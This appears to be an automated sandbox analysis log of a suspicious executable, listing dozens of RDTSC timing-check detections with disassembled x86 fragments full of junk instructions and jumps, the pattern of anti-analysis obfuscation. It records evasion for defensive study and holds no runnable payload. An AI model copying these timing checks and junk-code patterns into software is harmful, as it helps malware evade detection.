Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728076E second address: 7280773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280773 second address: 728079A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 05E1ACACh 0x00000008 mov dl, E7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ax, word ptr [ebx+6Ch] 0x00000011 jmp 00007F10C4816DFCh 0x00000016 mov word ptr [esi+30h], ax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728079A second address: 728079E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728079E second address: 72807A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72807A2 second address: 72807A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72807A8 second address: 72807E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 jmp 00007F10C4816E00h 0x00000015 mov word ptr [esi+32h], ax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e movsx edx, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72807E4 second address: 72807EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72807EA second address: 72807EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72807EE second address: 7280860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e pushad 0x0000000f jmp 00007F10C4818129h 0x00000014 pushfd 0x00000015 jmp 00007F10C4818120h 0x0000001a add si, B118h 0x0000001f jmp 00007F10C481811Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov dword ptr [esi+34h], eax 0x00000029 pushad 0x0000002a mov eax, 65A7AAEBh 0x0000002f mov ah, 0Ah 0x00000031 popad 0x00000032 mov eax, dword ptr [ebx+18h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F10C4818126h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280860 second address: 72808BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007F10C4816E06h 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 pushad 0x00000015 mov cx, C9DDh 0x00000019 jmp 00007F10C4816DFAh 0x0000001e popad 0x0000001f mov dword ptr [esi+3Ch], eax 0x00000022 jmp 00007F10C4816E00h 0x00000027 mov eax, dword ptr [ebx+20h] 0x0000002a pushad 0x0000002b mov esi, 6D037ABDh 0x00000030 push eax 0x00000031 push edx 0x00000032 mov edx, eax 0x00000034 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72808BB second address: 72808CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+40h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx ecx, bx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72808CB second address: 72808E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, dx 0x00000009 popad 0x0000000a lea eax, dword ptr [ebx+00000080h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72808E1 second address: 72808FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818126h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72808FB second address: 7280929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007F10C4816E06h 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280929 second address: 728092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728092D second address: 7280933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280933 second address: 7280939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280939 second address: 728093D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728093D second address: 7280960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F10C4818128h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280960 second address: 72809B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c movsx ebx, ax 0x0000000f pushfd 0x00000010 jmp 00007F10C4816E02h 0x00000015 xor cx, AE78h 0x0000001a jmp 00007F10C4816DFBh 0x0000001f popfd 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F10C4816E07h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72809B2 second address: 72809B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72809B7 second address: 72809C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop edi 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72809C5 second address: 72809E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 movsx edx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F10C481811Bh 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280A2A second address: 7280A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280A30 second address: 7280A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F10C481811Eh 0x00000008 pop eax 0x00000009 call 00007F10C481811Bh 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov edi, eax 0x00000014 jmp 00007F10C481811Fh 0x00000019 test edi, edi 0x0000001b jmp 00007F10C4818126h 0x00000020 js 00007F1134756D5Fh 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F10C4818127h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280A99 second address: 7280AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4816E04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280AB1 second address: 7280ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F10C4818128h 0x00000013 mov bx, cx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280ADB second address: 7280AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 9320h 0x00000007 push edi 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F10C4816DFEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280AFA second address: 7280B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 popad 0x00000011 push 00000001h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280B18 second address: 7280B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280B1F second address: 7280BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 0B9AA99Dh 0x00000008 pushfd 0x00000009 jmp 00007F10C481811Ah 0x0000000e and esi, 23644AF8h 0x00000014 jmp 00007F10C481811Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d nop 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F10C4818124h 0x00000025 sbb eax, 3020A558h 0x0000002b jmp 00007F10C481811Bh 0x00000030 popfd 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F10C4818126h 0x00000038 jmp 00007F10C4818125h 0x0000003d popfd 0x0000003e popad 0x0000003f popad 0x00000040 push eax 0x00000041 pushad 0x00000042 mov ax, dx 0x00000045 pushfd 0x00000046 jmp 00007F10C481811Fh 0x0000004b or cx, 0E2Eh 0x00000050 jmp 00007F10C4818129h 0x00000055 popfd 0x00000056 popad 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F10C481811Dh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280BE5 second address: 7280BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280BEB second address: 7280C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818123h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-08h] 0x0000000e pushad 0x0000000f call 00007F10C4818124h 0x00000014 pushfd 0x00000015 jmp 00007F10C4818122h 0x0000001a sbb cx, E068h 0x0000001f jmp 00007F10C481811Bh 0x00000024 popfd 0x00000025 pop eax 0x00000026 push edi 0x00000027 call 00007F10C4818124h 0x0000002c pop ecx 0x0000002d pop edx 0x0000002e popad 0x0000002f nop 0x00000030 jmp 00007F10C481811Eh 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280C6F second address: 7280C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280C73 second address: 7280C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818128h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280C8F second address: 7280CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280CA5 second address: 7280CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280CA9 second address: 7280CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280CAD second address: 7280CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280CFA second address: 7280D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D00 second address: 7280D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D04 second address: 7280D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a jmp 00007F10C4816E08h 0x0000000f js 00007F1134755789h 0x00000015 pushad 0x00000016 mov esi, 7D1724FDh 0x0000001b mov edi, esi 0x0000001d popad 0x0000001e mov eax, dword ptr [ebp-04h] 0x00000021 jmp 00007F10C4816E04h 0x00000026 mov dword ptr [esi+08h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F10C4816DFAh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D5D second address: 7280D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D61 second address: 7280D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D67 second address: 7280D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx eax, di 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D7B second address: 7280DB8 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bl, 68h 0x00000008 popad 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F10C4816DFCh 0x00000012 add esi, 517805C8h 0x00000018 jmp 00007F10C4816DFBh 0x0000001d popfd 0x0000001e mov ch, 8Fh 0x00000020 popad 0x00000021 push esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F10C4816DFAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280DB8 second address: 7280DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280DC7 second address: 7280DF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C4816DFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280DF6 second address: 7280E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C481811Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E06 second address: 7280E1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E1F second address: 7280E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 95C4h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E28 second address: 7280E3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E3D second address: 7280E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E41 second address: 7280E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E47 second address: 7280E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C481811Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E71 second address: 7280E86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E86 second address: 7280E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E8C second address: 7280EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F10C4816E02h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7280EA9 second address: 7280EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7280EAF second address: 7280EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7280F38 second address: 7280F47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7280F47 second address: 7280F91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c mov esi, 5731DA73h 0x00000011 mov si, AACFh 0x00000015 popad 0x00000016 mov dword ptr [esi+0Ch], eax 0x00000019 jmp 00007F10C4816E02h 0x0000001e mov edx, 772406ECh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7280F91 second address: 7280F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7280F95 second address: 7280F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7280F9B second address: 7280FC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F10C481811Ah 0x00000013 movzx ecx, bx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7280FC6 second address: 7281019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 mov al, 41h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lock cmpxchg dword ptr [edx], ecx 0x0000000e jmp 00007F10C4816E01h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F10C4816DFFh 0x0000001d sub ax, E4AEh 0x00000022 jmp 00007F10C4816E09h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7281019 second address: 728103F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818121h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10C481811Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 728103F second address: 7281078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1A54C322h 0x00000008 mov esi, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F1134755486h 0x00000013 pushad 0x00000014 call 00007F10C4816DFBh 0x00000019 mov cx, 30FFh 0x0000001d pop esi 0x0000001e mov ebx, 48A5FBB8h 0x00000023 popad 0x00000024 mov edx, dword ptr [ebp+08h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F10C4816DFAh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7281078 second address: 728107E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 728107E second address: 7281082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7281082 second address: 7281086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7281086 second address: 72810D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi] 0x0000000a pushad 0x0000000b jmp 00007F10C4816DFFh 0x00000010 mov ax, 79CFh 0x00000014 popad 0x00000015 mov dword ptr [edx], eax 0x00000017 pushad 0x00000018 mov ch, D3h 0x0000001a pushfd 0x0000001b jmp 00007F10C4816DFDh 0x00000020 xor ch, FFFFFFB6h 0x00000023 jmp 00007F10C4816E01h 0x00000028 popfd 0x00000029 popad 0x0000002a mov eax, dword ptr [esi+04h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 72810D7 second address: 72810EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 72810EA second address: 72810F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 72810F0 second address: 7281129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+04h], eax 0x0000000b jmp 00007F10C4818127h 0x00000010 mov eax, dword ptr [esi+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F10C4818120h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 7281129 second address: 728112D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 728112D second address: 7281133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
